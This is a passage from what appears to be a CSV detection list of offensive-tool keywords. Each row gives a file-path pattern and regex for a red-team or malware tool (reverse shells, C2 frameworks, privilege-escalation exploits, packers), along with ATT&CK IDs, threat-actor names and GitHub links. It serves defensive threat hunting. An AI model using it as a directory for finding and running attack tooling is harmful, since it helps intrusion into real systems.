TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Payload_Type/athena*",".{0,1000}\/Payload_Type\/athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Payload_Types/*",".{0,1000}\/Payload_Types\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/payload2.ps1*",".{0,1000}\/payload2\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/payloads/DllLdr/*",".{0,1000}\/payloads\/DllLdr\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/payloads/payloads.go*",".{0,1000}\/payloads\/payloads\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/payloads/util*",".{0,1000}\/payloads\/util.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/payloadtests.py*",".{0,1000}\/payloadtests\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*/pcanywhere-brute.nse*",".{0,1000}\/pcanywhere\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pcworx-info.nse*",".{0,1000}\/pcworx\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/PDF_Payload/script.txt*",".{0,1000}\/PDF_Payload\/script\.txt.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*/pdf2john.py*",".{0,1000}\/pdf2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/pe/dll*",".{0,1000}\/pe\/dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/PE/InjectPE.cs*",".{0,1000}\/PE\/InjectPE\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/pe_to_shellcode*",".{0,1000}\/pe_to_shellcode.{0,1000}","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2203","411","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" "*/pe2shc.exe*",".{0,1000}\/pe2shc\.exe.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*/pe2shc/*",".{0,1000}\/pe2shc\/.{0,1000}","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2203","411","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" "*/PEASS-ng.git*",".{0,1000}\/PEASS\-ng\.git.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*/PEASS-ng/*",".{0,1000}\/PEASS\-ng\/.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*/PeerToPeerService.*",".{0,1000}\/PeerToPeerService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/peinjector*",".{0,1000}\/peinjector.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/peinjector.*",".{0,1000}\/peinjector\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/pendulum.git*",".{0,1000}\/pendulum\.git.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","N/A","9","1","85","10","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z" "*/pentest*",".{0,1000}\/pentest.{0,1000}","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. repository or command line","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/PE-Obfuscator*",".{0,1000}\/PE\-Obfuscator.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*/perf_swevent64*",".{0,1000}\/perf_swevent64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/Perfusion.exe*",".{0,1000}\/Perfusion\.exe.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*/Perfusion.git*",".{0,1000}\/Perfusion\.git.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*/PerfusionDll.dll*",".{0,1000}\/PerfusionDll\.dll.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*/perl-reverse-shell.pl*",".{0,1000}\/perl\-reverse\-shell\.pl.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*/persist.tpl*",".{0,1000}\/persist\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/persist_cortana.py*",".{0,1000}\/persist_cortana\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/persist_people.py*",".{0,1000}\/persist_people\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/PersistBOF/*",".{0,1000}\/PersistBOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*/Persistence.cpp*",".{0,1000}\/Persistence\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/Persistence.sh*",".{0,1000}\/Persistence\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/persistence/*.ps1",".{0,1000}\/persistence\/.{0,1000}\.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1133","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/persistence/*.psm1",".{0,1000}\/persistence\/.{0,1000}\.psm1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1134","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/Persistence/InstallUtil.*",".{0,1000}\/Persistence\/InstallUtil\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/persistence_demos.git*",".{0,1000}\/persistence_demos\.git.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","1","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*/persistence2.rc*",".{0,1000}\/persistence2\.rc.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/Persistence-Accessibility-Features.git*",".{0,1000}\/Persistence\-Accessibility\-Features\.git.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*/persit_linux.go*",".{0,1000}\/persit_linux\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/persit_windows.go*",".{0,1000}\/persit_windows\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/peterspbr/dirty-pipe-otw*",".{0,1000}\/peterspbr\/dirty\-pipe\-otw.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/peterspbr/dirty-pipe-otw","1","1","N/A","N/A","1","1","0","2022-03-10T03:42:15Z","2022-03-09T17:21:17Z" "*/PetitPotam.git*",".{0,1000}\/PetitPotam\.git.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*/petitpotam.py*",".{0,1000}\/petitpotam\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/PetitPotato.cpp*",".{0,1000}\/PetitPotato\.cpp.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*/PetitPotato.git*",".{0,1000}\/PetitPotato\.git.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*/PetitPotato-1.0.0.zip*",".{0,1000}\/PetitPotato\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*/PEzor.cna*",".{0,1000}\/PEzor\.cna.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/PEzor.git*",".{0,1000}\/PEzor\.git.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/PEzor.git*",".{0,1000}\/PEzor\.git.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/PEzor.sh *",".{0,1000}\/PEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 